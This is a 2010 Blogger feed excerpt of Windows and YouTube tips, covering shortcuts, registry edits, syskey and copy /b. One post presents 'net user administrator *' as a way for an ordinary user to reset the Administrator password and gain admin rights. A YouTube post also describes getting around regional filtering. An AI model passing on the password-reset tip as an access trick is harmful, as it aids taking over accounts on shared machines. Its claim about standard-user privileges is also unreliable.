src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-5174668781720920202</id><published>2010-11-08T07:56:00.001-08:00</published><updated>2010-11-08T07:56:29.640-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Windows 7'/><category scheme='http://www.blogger.com/atom/ns#' term='shortcut'/><title type='text'>Keyboard shortcuts Windows 7</title><content type='html'>&lt;div align="center" style="-webkit-border-horizontal-spacing: 1px; -webkit-border-vertical-spacing: 1px; font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 13px;"&gt;&lt;u&gt;&lt;span style="font-size: medium;"&gt;&lt;span style="color: red;"&gt;&lt;b&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/u&gt;&lt;/div&gt;&lt;span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 1px; -webkit-border-vertical-spacing: 1px; font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 13px;"&gt;Windows 7 supports several useful new keyboard shortcuts.&lt;/span&gt;&lt;span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 1px; -webkit-border-vertical-spacing: 1px; font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 13px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 1px; -webkit-border-vertical-spacing: 1px; font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 13px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 1px; -webkit-border-vertical-spacing: 1px; font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 13px;"&gt;Alt+P&lt;/span&gt;&lt;span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 1px; -webkit-border-vertical-spacing: 1px; font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 13px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 1px; -webkit-border-vertical-spacing: 1px; font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 13px;"&gt;Display/ hide the Explorer preview pane&lt;/span&gt;&lt;span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 1px; -webkit-border-vertical-spacing: 1px; font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 13px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 1px; -webkit-border-vertical-spacing: 1px; font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 13px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 1px; -webkit-border-vertical-spacing: 1px; font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 13px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 1px; -webkit-border-vertical-spacing: 1px; font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 13px;"&gt;Windows Logo+G&lt;/span&gt;&lt;span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 1px; -webkit-border-vertical-spacing: 1px; font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 13px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 1px; -webkit-border-vertical-spacing: 1px; font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 13px;"&gt;Display gadgets in front of other windows&lt;/span&gt;&lt;span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 1px; -webkit-border-vertical-spacing: 1px; font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 13px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 1px; -webkit-border-vertical-spacing: 1px; font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 13px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 1px; -webkit-border-vertical-spacing: 1px; font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 13px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 1px; -webkit-border-vertical-spacing: 1px; font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 13px;"&gt;Windows Logo++ (plus key)&lt;/span&gt;&lt;span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 1px; -webkit-border-vertical-spacing: 1px; font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 13px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 1px; -webkit-border-vertical-spacing: 1px; font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 13px;"&gt;Zoom in, where appropriate&lt;/span&gt;&lt;span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 1px; -webkit-border-vertical-spacing: 1px; font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 13px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 1px; -webkit-border-vertical-spacing: 1px; font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 13px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 1px; -webkit-border-vertical-spacing: 1px; font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 13px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 1px; -webkit-border-vertical-spacing: 1px; font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 13px;"&gt;Windows Logo+- (minus key)&lt;/span&gt;&lt;span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 1px; -webkit-border-vertical-spacing: 1px; font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 13px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 1px; -webkit-border-vertical-spacing: 1px; font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 13px;"&gt;Zoom out, where appropriate&lt;/span&gt;&lt;span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 1px; -webkit-border-vertical-spacing: 1px; font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 13px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 1px; -webkit-border-vertical-spacing: 1px; font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 13px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 1px; -webkit-border-vertical-spacing: 1px; font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 13px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 1px; -webkit-border-vertical-spacing: 1px; font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 13px;"&gt;Windows Logo+Up&lt;/span&gt;&lt;span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 1px; -webkit-border-vertical-spacing: 1px; font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 13px;"&gt;&amp;nbsp;&lt;/span&gt;&lt;span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 1px; -webkit-border-vertical-spacing: 1px; font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 13px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 1px; -webkit-border-vertical-spacing: 1px; font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 13px;"&gt;Maximise the current window&lt;/span&gt;&lt;span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 1px; -webkit-border-vertical-spacing: 1px; font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 13px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 1px; -webkit-border-vertical-spacing: 1px; font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 13px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 1px; -webkit-border-vertical-spacing: 1px; font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 13px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 1px; -webkit-border-vertical-spacing: 1px; font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 13px;"&gt;Windows Logo+Down&lt;/span&gt;&lt;span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 1px; -webkit-border-vertical-spacing: 1px; font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 13px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 1px; -webkit-border-vertical-spacing: 1px; font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 13px;"&gt;Minimise the current window&lt;/span&gt;&lt;span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 1px; -webkit-border-vertical-spacing: 1px; font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 13px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 1px; -webkit-border-vertical-spacing: 1px; font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 13px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 1px; -webkit-border-vertical-spacing: 1px; font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 13px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 1px; -webkit-border-vertical-spacing: 1px; font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 13px;"&gt;Windows Logo+Left&lt;/span&gt;&lt;span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 1px; -webkit-border-vertical-spacing: 1px; font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 13px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 1px; -webkit-border-vertical-spacing: 1px; font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 13px;"&gt;Snap to the left hand side of the screen&lt;/span&gt;&lt;span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 1px; -webkit-border-vertical-spacing: 1px; font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 13px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 1px; -webkit-border-vertical-spacing: 1px; font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 13px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 1px; -webkit-border-vertical-spacing: 1px; font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 13px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 1px; -webkit-border-vertical-spacing: 1px; font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 13px;"&gt;Windows Logo+Right&lt;/span&gt;&lt;span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 1px; -webkit-border-vertical-spacing: 1px; font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 13px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 1px; -webkit-border-vertical-spacing: 1px; font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 13px;"&gt;Snap to the right hand side of the screen&lt;/span&gt;&lt;span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 1px; -webkit-border-vertical-spacing: 1px; font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 13px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 1px; -webkit-border-vertical-spacing: 1px; font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 13px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 1px; -webkit-border-vertical-spacing: 1px; font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 13px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 1px; -webkit-border-vertical-spacing: 1px; font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 13px;"&gt;Windows Logo+Home&lt;/span&gt;&lt;span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 1px; -webkit-border-vertical-spacing: 1px; font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 13px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 1px; -webkit-border-vertical-spacing: 1px; font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 13px;"&gt;Minimise/ restore everything except the current window&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-5174668781720920202?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/5174668781720920202/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2010/11/keyboard-shortcuts-windows-7.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/5174668781720920202'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/5174668781720920202'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2010/11/keyboard-shortcuts-windows-7.html' title='Keyboard shortcuts Windows 7'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-7137737269169443475</id><published>2010-11-08T07:48:00.001-08:00</published><updated>2010-11-08T07:48:28.392-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='registry entry'/><category scheme='http://www.blogger.com/atom/ns#' term='Windows'/><title type='text'>removing Dummy entries in Add/Remove Programs list</title><content type='html'>removing Dummy entries in Add/Remove Programs list&lt;br /&gt;Sometimes, even after program are uninstalled, or due to the files being deleted instead of a uninstalled, the entry &lt;br /&gt;&lt;br /&gt;in the Add/Remove Programs list does not get deleted. To remove it form the list: 1. Start the Registry Editor. 2. &lt;br /&gt;&lt;br /&gt;Open HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows \current version\Uninstall. 3. Delete the program entry here. You &lt;br /&gt;&lt;br /&gt;can also use TweakUI to do this&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-7137737269169443475?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/7137737269169443475/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2010/11/removing-dummy-entries-in-addremove.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/7137737269169443475'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/7137737269169443475'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2010/11/removing-dummy-entries-in-addremove.html' title='removing Dummy entries in Add/Remove Programs list'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-8429243060545650252</id><published>2010-03-11T05:07:00.000-08:00</published><updated>2010-03-11T05:07:29.438-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Other'/><category scheme='http://www.blogger.com/atom/ns#' term='Fun'/><title type='text'>Some YouTube Tricks</title><content type='html'>1. View high quality videos&lt;br /&gt;Youtube gives you the option to switch to high quality videos for some of the videos, however you can check if a video is available in high quality format by appending ‘&amp;fmt=18′(stereo, 480 x 270 resolution) or ‘&amp;fmt=22′(stereo, 1280 x 720 resolution) for even higher quality.&lt;br /&gt;&lt;br /&gt;2. Embed Higher Quality Videos&lt;br /&gt;While the above trick works for playback, if however you want to embed hig quality videos you need to append “&amp;ap=%2526fmt%3D18″ and “&amp;ap=%2526fmt%3D22″ to the embed url.&lt;br /&gt;&lt;br /&gt;3. Cut the chase and link to the interesting part&lt;br /&gt;Linking to a video where the real action starts at 3 minutes 22 seconds, wondered if you could make it start at 03:22? You are in luck. All you have to do is add #t=03m22s (#t=XXmYYs for XX mins and YY seconds) to the end of the URL.&lt;br /&gt;&lt;br /&gt;4. Hide the search box&lt;br /&gt;The search box appears when you hover over an embedded video. To hide the search box add ‘&amp;showsearch=0′ to the embed url.&lt;br /&gt;&lt;br /&gt;5. Embed only a part of Video&lt;br /&gt;Just append ‘&amp;start=30′ to skip first 30s of the video. In general you can modify the value after start= to the number of seconds you want to skip the video for.&lt;br /&gt;&lt;br /&gt;6. Autoplay an embedded video&lt;br /&gt;Normally when you embed a Youtube video and load the page, the player is loaded and it sits there waiting for you to hit the play button. You can make the video play automatically by adding ‘&amp;autoplay=1′ to the url part of the embed code.&lt;br /&gt;&lt;br /&gt;7. Loop an embedded video&lt;br /&gt;Append ‘&amp;loop=1′ to make the video start again without user intervention after it reaches the end.&lt;br /&gt;&lt;br /&gt;8. Disable Related Videos&lt;br /&gt;Publishing your content in the form of Youtube video? Don’t want people to see other people’s content that may be related but may as well be in competition to you? Just add ‘&amp;rel=0′ to the end of the url part of the embed code and you just turned off the related video suggestions!&lt;br /&gt;&lt;br /&gt;9. Bypass Youtube Regional Filtering&lt;br /&gt;Some videos are only available in certain parts of the world. Your IP Address is used to determine your location and then allow or deny access to the video. Change the url from http://www.youtube.com/watch?v=&lt;somecode&gt; to http://www.youtube.com/v/&lt;somecode&gt;&lt;br /&gt;&lt;br /&gt;10. Download Video&lt;br /&gt;Although not inherently a youtube trick but useful all the same for downloading videos. Just change youtube to kickyoutube in the url of the video and it will take you to kickyoutube.com with all the options for downloading the video you were watching.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-8429243060545650252?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/8429243060545650252/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2010/03/some-youtube-tricks.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/8429243060545650252'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/8429243060545650252'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2010/03/some-youtube-tricks.html' title='Some YouTube Tricks'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-7476432828529301004</id><published>2010-03-11T05:04:00.000-08:00</published><updated>2010-03-11T05:04:16.781-08:00</updated><title type='text'>How to change the Admin password using the user account</title><content type='html'>For this just open ur command prompt &lt;br /&gt;&lt;br /&gt;type " net user " &lt;br /&gt;it will give the all the users&lt;br /&gt;then type " net user administrator * "&lt;br /&gt;(Administrator is default admin for all the computer systems having the very strong password)&lt;br /&gt;&lt;br /&gt;then it will give you&lt;br /&gt;"type a new password for this user"&lt;br /&gt;type in the password and press enter&lt;br /&gt;(Note :- the password which youll be typing will be invisible plz type correctly as it not visible and then reenter and press enter)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;then log off and loging using the admin username as &lt;br /&gt;Administrator&lt;br /&gt;and the given password&lt;br /&gt;and youll be loging in with admin rights.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-7476432828529301004?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/7476432828529301004/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2010/03/how-to-change-admin-password-using-user.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/7476432828529301004'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/7476432828529301004'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2010/03/how-to-change-admin-password-using-user.html' title='How to change the Admin password using the user account'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-7108323825197658210</id><published>2010-03-11T05:00:00.001-08:00</published><updated>2010-03-11T05:00:22.346-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='XP'/><category scheme='http://www.blogger.com/atom/ns#' term='hide'/><title type='text'>To Make ur more prtected ur PC</title><content type='html'>Many wud know about BIOS password and logon password&lt;br /&gt;&lt;br /&gt;There is also another startup password for more protection&lt;br /&gt;&lt;br /&gt;1)Open Run and type syskey&lt;br /&gt;2)A "Securing the windows....." window will open.&lt;br /&gt;3)Click on update button and in the opening window select password start password&lt;br /&gt;4)Give a password.&lt;br /&gt;&lt;br /&gt;This will create another password for statrup&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-7108323825197658210?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/7108323825197658210/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2010/03/to-make-ur-more-prtected-ur-pc.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/7108323825197658210'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/7108323825197658210'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2010/03/to-make-ur-more-prtected-ur-pc.html' title='To Make ur more prtected ur PC'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-2912882989522503549</id><published>2010-03-11T04:59:00.001-08:00</published><updated>2010-03-11T04:59:00.446-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Windows'/><category scheme='http://www.blogger.com/atom/ns#' term='hide'/><title type='text'>To show Hidden files</title><content type='html'>There is a simple registry entry which can solve your problem.&lt;br /&gt;1)Go to Start|Run&lt;br /&gt;2)type regedit&lt;br /&gt;&lt;br /&gt;3)Go to the path given below&lt;br /&gt;&lt;br /&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL&lt;br /&gt;&lt;br /&gt;4)There you will find&lt;br /&gt;&lt;br /&gt;CheckedValue REG_DWORD 0x00000001(2)&lt;br /&gt;DefaultValue REG_DWORD 0x00000002(2)&lt;br /&gt;&lt;br /&gt;5)Change CheckedValue value from 2 to 1&lt;br /&gt;&lt;br /&gt;i.e.CheckedValue REG_DWORD 0x00000001(1)&lt;br /&gt;&lt;br /&gt;It will work&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-2912882989522503549?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/2912882989522503549/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2010/03/to-show-hidden-files.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/2912882989522503549'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/2912882989522503549'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2010/03/to-show-hidden-files.html' title='To show Hidden files'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-1211447679924115840</id><published>2010-03-11T04:54:00.001-08:00</published><updated>2010-03-11T04:54:31.290-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Other'/><category scheme='http://www.blogger.com/atom/ns#' term='Run'/><title type='text'>Join file with command prompt</title><content type='html'>First: lets say you have 3 videos in your hardrive root: dbilla****1.mpg, dbilla****2.mpg and dbilla****3.mpg just rename them to 1, 2, and 3 (just the number and take off the extension)&lt;br /&gt;&lt;br /&gt;Second: go on start menu, click on run and type cmd and press enter&lt;br /&gt;&lt;br /&gt;Third: now type your hardrive letter (ie: C)&lt;br /&gt;&lt;br /&gt;Fourth: Type: Copy /b 1 + 2 + 3 dbilla****.mpg&lt;br /&gt;and click enter&lt;br /&gt;&lt;br /&gt;Fifth now wait till you see: 1 files&lt;s&gt; copied.&lt;br /&gt;C:&gt;&lt;br /&gt;&lt;br /&gt;And type exit and press enter and you are done!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-1211447679924115840?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/1211447679924115840/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2010/03/join-file-with-command-prompt.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/1211447679924115840'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/1211447679924115840'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2010/03/join-file-with-command-prompt.html' title='Join file with command prompt'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' 